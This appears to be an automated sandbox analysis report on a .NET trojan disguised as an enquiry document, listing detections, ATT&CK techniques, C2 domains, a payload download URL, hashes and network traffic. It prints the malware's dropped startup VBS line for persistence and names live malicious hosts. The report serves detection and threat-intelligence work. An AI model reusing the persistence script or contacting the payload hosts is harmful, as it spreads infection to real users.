Source: Yara match	File source: 00000002.00000002.2693820397.0000000000412000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1793313944.00000000030BF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Enquiry#039855.exe PID: 5932, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Enquiry#039855.exe PID: 4536, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	1 Scheduled Task/Job	1 Scripting	11 Process Injection	1 Masquerading	OS Credential Dumping	211 Security Software Discovery	Remote Services	11 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 Scheduled Task/Job	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Registry Run Keys / Startup Folder	2 Registry Run Keys / Startup Folder	1 Disable or Modify Tools	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	1 DLL Side-Loading	1 DLL Side-Loading	11 Process Injection	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Software Packing	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Enquiry#039855.exe	25%	Virustotal		Browse
Enquiry#039855.exe	24%	ReversingLabs	Win32.Trojan.Generic
Enquiry#039855.exe	100%	Avira	HEUR/AGEN.1308645

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Sign.exe	100%	Avira	HEUR/AGEN.1308645
C:\Users\user\AppData\Roaming\Sign.exe	24%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
bin12.ydns.eu	0%	Avira URL Cloud	safe
smfcs3.ydns.eu	0%	Avira URL Cloud	safe
http://win32.ydns.eu	0%	Avira URL Cloud	safe
bin14.ydns.eu	0%	Avira URL Cloud	safe
kingsbkup1.ydns.eu	0%	Avira URL Cloud	safe
smfcs1.ydns.eu	0%	Avira URL Cloud	safe
http://win32.ydns.eu/never/lookinto/it/panel/uploads/Tnemxaef.vdf	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
win32.ydns.eu	45.144.214.104	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
smfcs3.ydns.eu	true	Avira URL Cloud: safe	unknown
kingsbkup1.ydns.eu	true	Avira URL Cloud: safe	unknown
bin14.ydns.eu	true	Avira URL Cloud: safe	unknown
bin12.ydns.eu	true	Avira URL Cloud: safe	unknown
http://win32.ydns.eu/never/lookinto/it/panel/uploads/Tnemxaef.vdf	false	Avira URL Cloud: safe	unknown
smfcs1.ydns.eu	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://github.com/mgravell/protobuf-neti	Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/14436606/23354	Enquiry#039855.exe, 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp, Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp	false		high
https://github.com/mgravell/protobuf-netJ	Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/11564914/23354;	Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp	false		high
https://stackoverflow.com/q/2152978/23354	Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp	false		high
http://win32.ydns.eu	Enquiry#039855.exe, 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/mgravell/protobuf-net	Enquiry#039855.exe, 00000000.00000002.1802441846.0000000006170000.00000004.08000000.00040000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Enquiry#039855.exe, 00000000.00000002.1793313944.0000000002D11000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
45.144.214.104	win32.ydns.eu	Ukraine		47169	HPC-MVM-ASHU	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1627137
Start date and time:	2025-03-01 14:41:21 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 25s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Enquiry#039855.exe
Detection:	MAL
Classification:	mal100.troj.expl.evad.winEXE@4/3@1/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 96% Number of executed functions: 11 Number of non-executed functions: 4
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.253.72
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Enquiry#039855.exe, PID 4536 because it is empty
Execution Graph export aborted for target Enquiry#039855.exe, PID 5932 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
14:42:59	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sign.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
45.144.214.104	SCS AWB and Commercial Invoice.exe	Get hash	malicious	Snake Keylogger, XWorm	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HPC-MVM-ASHU	Auftragsbest#U00e4tigung.exe	Get hash	malicious	Quasar	Browse	45.144.214.107
	IRSTaxRefund.exe	Get hash	malicious	DBatLoader, Remcos	Browse	45.144.214.126
	SCS AWB and Commercial Invoice.exe	Get hash	malicious	Snake Keylogger, XWorm	Browse	45.144.214.104
	PaRWfF3x5K.elf	Get hash	malicious	Unknown	Browse	45.131.150.253
	6uBxa0vGQt.elf	Get hash	malicious	Gafgyt	Browse	213.181.218.192
	SoqyJuUVvW.elf	Get hash	malicious	Mirai	Browse	45.131.150.244
	NJh7IrK6IZ.elf	Get hash	malicious	Mirai	Browse	45.131.150.235
	Purchase Order_NO3682720.xlam.xlsx	Get hash	malicious	Unknown	Browse	45.144.214.37
	cOI5Ae4qI8.elf	Get hash	malicious	Mirai, Moobot	Browse	87.229.42.248
	sDZf1h3xl6.elf	Get hash	malicious	Mirai	Browse	87.229.42.237

Process:	C:\Users\user\Desktop\Enquiry#039855.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	80
Entropy (8bit):	4.709506614141224
Encrypted:	false
SSDEEP:	3:FER/n0eFHHoCHyg4EaKC5WlHn:FER/lFHICHhJaZ58
MD5:	D6A20A23AA0CF9155FBC9A4540461A72
SHA1:	FCFAD3C8EEAC279393FB94BC67A4CB8CAC3E6EAD
SHA-256:	0CD7F73B8064C5CA71AEE22E255809F74E33476B644973A789808BB37EFD58D8
SHA-512:	9044BA2E3279C137C91840A8EEBCEA424BE206F0118AA96272FC972D4D42070AAFEBE8DA37B747640D16F7D8CD2E273DB502AFFD05A7B5D160923ACA1F415815
Malicious:	true
Reputation:	low
Preview:	CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Sign.exe"""

C:\Users\user\AppData\Roaming\Sign.exe

Download File

Process:	C:\Users\user\Desktop\Enquiry#039855.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	10752
Entropy (8bit):	5.121470651272075
Encrypted:	false
SSDEEP:	96:YkdSfY8xVcZbqvLV1FKBh1gf4oSU26z2Eg8Qjh0awDabXrVLZD+t8EM/cRV7kPzj:YTvVMuV1o+f4qu8Qh7wDarrX+u/w6
MD5:	A69AD9D0FB5BDF7EA93DBFCA99495D80
SHA1:	B3DC5CD3283982A73153E72EC76DD08060F40B8F
SHA-256:	BAD755124567617E4879874AD80EF2A54B6D6BB69C9DA57F7073320D91759E37
SHA-512:	D16FAF32A85E68F0D42328AE0163E24A1AAF2538F35DE57E2A6524E96BE9274A730D887F14D72FE7C9914C4DADCF06F160D7AB95E8F8DAF676E508A32C201FBC
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 24%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................. ...........>... ...@....@.. ....................................`.................................x>..S....@.......................`....................................................... ............... ..H............text........ ... .................. ..`.rsrc........@......."..............@..@.reloc.......`.......(..............@..B.................>......H........'..d............................................................r...p(.....r3..p(....2(.....o....6.\|.....( ...6.\|.....(%...6.\|.....(%...6.\|.....(%.....(+...J.o,....{....(-....0../.........(....}.......}......\|......(...+..\|....(......0...........(....o.......(.....0..7.........(....}.......}.......}......\|......(...+..\|....(......0../.........(....}.......}......\|......(...+..\|....(......0../.........(....}.......}......\|......(...+..\|....(......0..s...

C:\Users\user\AppData\Roaming\Sign.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Enquiry#039855.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.121470651272075
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Enquiry#039855.exe
File size:	10'752 bytes
MD5:	a69ad9d0fb5bdf7ea93dbfca99495d80
SHA1:	b3dc5cd3283982a73153e72ec76dd08060f40b8f
SHA256:	bad755124567617e4879874ad80ef2a54b6d6bb69c9da57f7073320d91759e37
SHA512:	d16faf32a85e68f0d42328ae0163e24a1aaf2538f35de57e2a6524e96be9274a730d887f14d72fe7c9914c4dadcf06f160d7ab95e8f8daf676e508a32c201fbc
SSDEEP:	96:YkdSfY8xVcZbqvLV1FKBh1gf4oSU26z2Eg8Qjh0awDabXrVLZD+t8EM/cRV7kPzj:YTvVMuV1o+f4qu8Qh7wDarrX+u/w6
TLSH:	27220A1063E88323DD6D07BD99F3974183B0FA53EC96DE5E2C88318AAE1761156473BA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g................. ...........>... ...@....@.. ....................................`................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x403ece
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x67C2EE1B [Sat Mar 1 11:23:07 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3e78	0x53	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4000	0x586	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x6000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x1ed4	0x2000	c9e792db24326ce2295a4e20265b01cf	False	0.497802734375	data	5.550039529850495	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4000	0x586	0x600	95e3dc0f05d67ca5c547a04c49f9a4a5	False	0.4127604166666667	data	4.043246573352357	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x6000	0xc	0x200	edafec3bba850202a07efe27d023134c	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x40a0	0x2fc	data			0.43848167539267013
RT_MANIFEST	0x439c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
Translation	0x0000 0x04b0
Comments
CompanyName
FileDescription	DOGGY
FileVersion	1.0.0.0
InternalName	DOGGY.exe
LegalCopyright	Copyright 2022
LegalTrademarks
OriginalFilename	DOGGY.exe
ProductName	DOGGY
ProductVersion	1.0.0.0
Assembly Version	1.0.0.0

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 1, 2025 14:42:22.010660887 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:22.015775919 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.015870094 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:22.017040014 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:22.023289919 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.754475117 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.754492998 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.754553080 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:22.754610062 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.754622936 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.754635096 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.754647017 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.754671097 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:22.754692078 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:22.754779100 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.754791975 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.754803896 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.754816055 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.754829884 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:22.754864931 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:22.759738922 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.759753942 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.759808064 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:22.882844925 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.882889986 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.882981062 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.882992983 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.883003950 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.883038044 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.883047104 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:22.883050919 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.883086920 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:22.883960009 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.883971930 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.883984089 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.883996010 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.884007931 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.884109974 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:22.884756088 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.884768963 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.884779930 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.884824038 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:22.885122061 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.885155916 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.885168076 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.885231018 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.885243893 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.885286093 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:22.885299921 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:22.886113882 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.886126041 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:22.886172056 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.013318062 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.013333082 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.013397932 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.013431072 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.013441086 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.013453960 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.013499022 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.013509035 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.013520002 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.013531923 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.013560057 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.013576984 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.014110088 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.014161110 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.014172077 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.014209986 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.014488935 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.014502048 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.014516115 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.014533043 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.014549017 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.014549017 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.015083075 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.015095949 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.015109062 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.015120983 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.015145063 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.015155077 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.015157938 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.015163898 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.015171051 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.015182972 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.015214920 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.016047001 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.016060114 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.016072989 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.016083956 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.016098976 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.016110897 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.016110897 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.016123056 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.016125917 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.016150951 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.016877890 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.016928911 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.016947985 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.016958952 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.016973972 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.016984940 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.016998053 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.017016888 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.017057896 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.017066002 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.017405987 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.143747091 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.143770933 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.143784046 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.143814087 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.143851995 CET	49704	80	192.168.2.8	45.144.214.104
Mar 1, 2025 14:42:23.143899918 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.143913031 CET	80	49704	45.144.214.104	192.168.2.8
Mar 1, 2025 14:42:23.143919945 CET	49704	80	192.168.2.8	45.144.214.104
